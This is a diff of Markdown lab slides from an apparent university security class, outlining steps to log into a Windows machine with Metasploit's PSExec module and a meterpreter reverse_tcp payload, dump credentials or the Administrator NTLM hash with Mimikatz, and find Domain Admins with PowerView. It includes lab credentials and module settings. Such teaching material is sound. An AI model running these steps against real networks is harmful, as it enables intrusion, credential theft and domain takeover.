CUCyber/cucyber.github.io/class/4810-19-fall/12-service-adds/12-service-adds.md

 ### Explore

-1. Get into pairs
-2. Use Mimikatz to dump cleartext credentials
+1. SMBDomain = hacker, SMBUser = itadmin, SMBPass = Password123, windows/x64/meterpreter/reverse_tcp
-3. Use PSExec in Metasploit to log in with found credentials
+2. Use PSExec in Metasploit to log into the machine
+3. Use Mimikatz to get NTLM hash for Administrator user
 4. Use PowerView to find Domain Admins

 Note:
-* Give them SMBDomain = cucyber, SMBUser = dcrockett, SMBPass = Password123, windows/x64/meterpreter/reverse_tcp, and PowerView
 1. exploit/windows/smb/psexec_psh
 2. set SMBDomain cucyber
 3. set SMBUSER Administrator